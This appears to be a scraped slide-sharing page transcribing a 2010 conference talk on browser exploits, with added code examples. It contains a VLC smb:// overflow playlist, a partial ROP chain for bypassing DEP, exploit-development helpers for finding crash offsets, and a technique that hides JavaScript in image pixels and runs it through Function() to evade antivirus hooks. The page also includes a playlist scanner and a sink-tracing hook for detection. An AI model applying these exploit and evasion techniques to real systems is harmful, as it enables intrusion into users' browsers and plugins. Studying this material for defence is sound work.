Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Victor Rentea
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Zilliz
 

Último (20)

DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
W.E.B. 2010 - Web, Exploits, Browsers

  • 1. W.E.B. 2010 - Web . Exploits . Browsers. Saumil Shah, Hack in the Box - Kuala Lumpur 2010
  • 2. # who am i Saumil Shah, CEO Net-square LinkedIn: saumilshah
  • 4. LOOK AT ALL THE COOL STUFF!! 5
  • 6. 5 With JIT! Fights DEP, ASLR!
  • 7. 5 Worldwide coverage, Hides your tracks.
  • 8. 5 ...as never seen before!
  • 9. 5 GUARANTEED!! Fresh new bugs, Present on most computers
  • 13. I can haz sandbox I Also Can!
  • 14. IM IN UR BASE KILLING UR D00DZ Sploit Time!
  • 15. See no EVAL: CVE-2010-2883 (0+1)day exploit. Obfuscated JavaScript decoded without using eval, document.write, etc.
  • 17. Who you gonna call?
  • 18. howstuffworks - Anti Virus YER NOT ON THE LIST! COME ON IN.
  • 19. howstuffworks - Anti Virus These are not the sploitz you're looking for.
  • 20. 0-day to the Face! "To get our new signature files you need a valid support plan."
  • 21. ...and keep on patching
  • 23. W3C "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]
  • 25. Application Delivery The Web at present Authentication Statefulness Data Typing Non-mutable HTTP HTML AJAX Flash Sandbox HTML5 Anti-XSS WAF Silverlight Web sockets MIND THE GAP
  • 27. Making the impossible possible smb:// mrl buffer overflow
  • 28. VLC smb:// overflow - playlist
        <?xml version="1.0" encoding="UTF-8"?>
        <playlist version="1"
                  xmlns="http://xspf.org/ns/0/"
                  xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
          <title>Playlist</title>
          <trackList>
            <track>
              <location>smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}</location>
              <extension application="http://www.videolan.org/vlc/playlist/0">
                <vlc:id>0</vlc:id>
              </extension>
            </track>
          </trackList>
        </playlist>
  • 29. ...just add bit.ly smb:// mrl buffer overflow
  • 32. VLC smb overflow - HTMLized!!
        <embed type="application/x-vlc-plugin"
               width="320" height="200"
               target="http://tinyurl.com/ycctrzf"
               id="vlc" />
        I'm in ur browser.... ...blowin up ur g00dz pwn
  • 34. I'm an evil Javascript I'm an innocent image
  • 35. EET - Exploit Enabler Technology <canvas>
        // packv(n): pack a 32-bit value as two %uXXXX escapes, low word first,
        // so the bytes land little-endian when the string is placed in memory
        function packv(n){
            var s=new Number(n).toString(16);
            while(s.length<8) s="0"+s;
            return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)));
        }
        // ROP gadget addresses, hard-coded for one module build
        // (two entries are 0x00000000 on the slide, i.e. not resolved)
        var addressof=new Array();
        addressof["ropnop"]=0x6d81bdf0;
        addressof["xchg_eax_esp_ret"]=0x6d81bdef;
        addressof["pop_eax_ret"]=0x6d906744;
        addressof["pop_ecx_ret"]=0x6d81cd57;
        addressof["mov_peax_ecx_ret"]=0x6d979720;
        addressof["mov_eax_pecx_ret"]=0x6d8d7be0;
        addressof["mov_pecx_eax_ret"]=0x6d8eee01;
        addressof["inc_eax_ret"]=0x6d838f54;
        addressof["add_eax_4_ret"]=0x00000000;
        addressof["call_peax_ret"]=0x6d8aec31;
        addressof["add_esp_24_ret"]=0x00000000;
        addressof["popad_ret"]=0x6d82a8a1;
        addressof["call_peax"]=0x6d802597;
        // builds the ROP chain that calls NtAllocateVirtualMemory
        // (to obtain an executable region despite DEP)
        function call_ntallocatevirtualmemory(baseptr,size,callnum){
            var ropnop=packv(addressof["ropnop"]);
            var pop_eax_ret=packv(addressof["pop_eax_ret"]);
            var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);
            var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);
            var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);
            var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);
            var call_peax_ret=packv(addressof["call_peax_ret"]);
            var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);
            var popad_ret=packv(addressof["popad_ret"]);
            var retval="";
            // the slide cuts off here; the rest of the chain is not on it
            return retval;
        }
  • 36. The Solution? HTML 8.0 HTTP 2.0 Browser Security Model Self Contained Apps
  • 37. shoutz... L33tdawg, Amy, cbelinda KUL volunteerz NL crew Paul Vixie
  • 38. kthxbai www.net-square.com secure . automate . innovate
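Added example for slides 27-32, written for this page and not taken from the talk: the XSPF playlist from slide 28 rebuilt with a cyclic alphanumeric pattern in place of the AAAA... filler, the helper that maps a crashed register value back to an offset in that pattern, and a triage check that flags playlists carrying oversized smb:// MRLs. The function names, the 2000-byte pattern length and the 256-byte threshold are assumptions made for the illustration, not VLC's limits, and nothing here is a working exploit.

```javascript
// Added example, not code from the talk.
const UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
const LOWER = "abcdefghijklmnopqrstuvwxyz";
const DIGITS = "0123456789";

// Metasploit pattern_create style: "Aa0Aa1Aa2...". Every 4-byte window is unique
// within the first 20280 bytes, and only [A-Za-z0-9] is used, so the string
// survives being pasted into a URL (or a URL shortener) unchanged.
function cyclicPattern(length) {
  const maxUnique = UPPER.length * LOWER.length * DIGITS.length * 3;
  if (length > maxUnique) throw new Error("pattern longer than " + maxUnique + " repeats");
  let out = "";
  outer: for (const a of UPPER) {
    for (const b of LOWER) {
      for (const c of DIGITS) {
        if (out.length >= length) break outer;
        out += a + b + c;
      }
    }
  }
  return out.slice(0, length);
}

// Map the 32-bit value that landed in a register (hex, as a debugger prints it)
// back to the byte offset in the pattern. The CPU read it little-endian, so the
// bytes are reversed before searching. Returns -1 if the value is not from the pattern.
function patternOffset(pattern, regHex) {
  const v = parseInt(regHex, 16) >>> 0;
  const needle = String.fromCharCode(v & 0xff, (v >>> 8) & 0xff, (v >>> 16) & 0xff, (v >>> 24) & 0xff);
  return pattern.indexOf(needle);
}

// The playlist layout from slide 28, with the MRL substituted in.
function buildXspf(mrl) {
  const esc = s => s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
  return `<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
  <title>Playlist</title>
  <trackList>
    <track>
      <location>${esc(mrl)}</location>
      <extension application="http://www.videolan.org/vlc/playlist/0">
        <vlc:id>0</vlc:id>
      </extension>
    </track>
  </trackList>
</playlist>
`;
}

// Triage helper for downloaded playlists: every <location> whose MRL is smb://
// and longer than maxLen (an assumed threshold) is reported with its length.
function suspiciousLocations(xspf, maxLen = 256) {
  const re = /<location>\s*([^<]+?)\s*<\/location>/g;
  const hits = [];
  for (const m of xspf.matchAll(re)) {
    const loc = m[1].replace(/&amp;/g, "&").replace(/&lt;/g, "<").replace(/&gt;/g, ">");
    if (/^smb:\/\//i.test(loc) && loc.length > maxLen) {
      hits.push({ location: loc.slice(0, 40) + "...", length: loc.length });
    }
  }
  return hits;
}

// Constructed input: the slide's MRL with a 2000-byte pattern after the '#'.
const MRL = "smb://example.com@0.0.0.0/foo/#" + cyclicPattern(2000);
const PLAYLIST = buildXspf(MRL);

console.log(suspiciousLocations(PLAYLIST));
// If the crash showed e.g. EIP = 61413261, this tells you which pattern bytes got there:
console.log("offset:", patternOffset(cyclicPattern(2000), "61413261"));
```

The pattern and offset helpers are generic exploit-development tooling; they say nothing about where VLC's actual overflow sits. The scanner is deliberately a regex over the text rather than a full XML parser so it can also run over playlists that are malformed on purpose.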

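Added example for slides 15, 34 and 35, written for this page rather than taken from the talk: a JavaScript payload carried in an image's pixel data (the buffer a canvas hands back from getImageData) is decoded and run through the Function constructor, so a sandbox or AV emulator that only hooks eval() and document.write() ("See no EVAL") records nothing. The same block carries a hook that shows which sink the payload did reach. The pixel layout, function names and the payload are all constructed for the illustration; the talk's own decoder and payload are not on this page.

```javascript
// Added example, not code from the talk. A 32x4 RGBA buffer stands in for
// ctx.getImageData(0, 0, 32, 4).data; the payload rides in the red channel.
const W = 32, H = 4;

// Pixel 0 holds the payload length (R = high byte, G = low byte); pixels 1..n hold
// one payload byte each in R. Every other channel stays 255, so the picture is an
// opaque, almost-white image that any viewer decodes normally.
function encodeIntoPixels(src, width = W, height = H) {
  const bytes = new TextEncoder().encode(src);
  if (bytes.length + 1 > width * height) throw new Error("payload does not fit in the image");
  const px = new Uint8ClampedArray(width * height * 4).fill(255);
  px[0] = bytes.length >> 8;
  px[1] = bytes.length & 0xff;
  bytes.forEach((b, i) => { px[(i + 1) * 4] = b; });
  return px;
}

function decodeFromPixels(px) {
  const n = (px[0] << 8) | px[1];
  const out = new Uint8Array(n);
  for (let i = 0; i < n; i++) out[i] = px[(i + 1) * 4];
  return new TextDecoder().decode(out);
}

// The sink: Function(...) compiles a string to code exactly like eval() does, but an
// emulator whose only hooks are eval()/document.write() never sees the source text.
function runPayload(px) {
  return Function(decodeFromPixels(px))();
}

// Defender side: wrap the named string-to-code sinks on the global object and
// record every source string that reaches one of them while fn runs.
function traceSinks(sinkNames, fn) {
  const seen = [];
  const saved = {};
  for (const name of sinkNames) {
    const orig = globalThis[name];
    saved[name] = orig;
    globalThis[name] = function (...args) {
      seen.push({ sink: name, code: String(args[args.length - 1]) });
      return orig.apply(this, args);
    };
  }
  try {
    fn();
  } finally {
    Object.assign(globalThis, saved);   // always put the real sinks back
  }
  return seen;
}

// Constructed payload: a harmless marker instead of shellcode.
const PAYLOAD = "globalThis.marker = (globalThis.marker || 0) + 1; return 'payload ran';";
const IMAGE = encodeIntoPixels(PAYLOAD);

// Stand-alone demo: hooking eval alone misses the sink, hooking Function catches it.
const missed = traceSinks(["eval"], () => runPayload(IMAGE));
const caught = traceSinks(["eval", "Function"], () => runPayload(IMAGE));
console.log("eval-only hook saw", missed.length, "call(s); with Function hooked:",
            caught.map(s => s.sink).join(","));
```

In a browser the buffer comes from `ctx.drawImage(img, 0, 0)` followed by `ctx.getImageData(0, 0, w, h).data`. Two practical constraints apply: the image has to be served in a lossless format (PNG, GIF, BMP), because JPEG recompression changes channel values and corrupts the bytes, and it has to come from the same origin or with CORS headers, otherwise the canvas is tainted and getImageData throws. For detection, the lesson is the one slides 17-19 make about AV: a list of known-bad sinks is only as good as its coverage, and Function, setTimeout with a string, and event-handler attributes are all sinks in their own right.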
Editor's notes

  1. Talk about the BROWSER WARS. The race is on for the fastest JS interpreter. IE vs FF, Chrome vs Safari, Chrome offering an IE-plugin (Frankenchrome), IE calling the Chrome plugin insecure, Steve Jobs trashing Flash, Chrome making Flash an integral part of the browser, and the list goes on...
  2. Slew of recent Java vulnerabilities. Latest one being the command exec vuln with JavaWebStart. Quicktime, VLC and other plugins keep getting exploited regularly. So do toolbars.
  3. Flash Sprays
  4. URL Shorteners, can host an entire exploit.
  5. 800+ Javascript events, Video, and more
  6. Sandboxing isn't the solution.